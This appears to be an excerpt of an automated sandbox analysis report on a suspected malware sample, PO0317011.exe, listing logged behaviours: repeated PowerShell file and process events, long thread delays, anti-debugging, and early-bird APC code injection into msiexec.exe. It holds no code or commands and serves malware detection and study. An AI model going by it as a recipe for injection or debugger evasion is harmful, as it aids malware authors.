Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6420Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3191Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\PO0317011.exeCode function: 0_2_00406393 FindFirstFileW,FindClose,0_2_00406393
Source: C:\Users\user\Desktop\PO0317011.exeCode function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405841
Source: C:\Users\user\Desktop\PO0317011.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: ModuleAnalysisCache.1.drBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.1.drBinary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 0000000B.00000002.2490542175.0000000007CDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2490542175.0000000007D42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.1.drBinary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Users\user\Desktop\PO0317011.exeAPI call chain: ExitProcess graph end nodegraph_0-2864
Source: C:\Users\user\Desktop\PO0317011.exeAPI call chain: ExitProcess graph end nodegraph_0-3043
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Early bird code injection technique detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 2C30000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
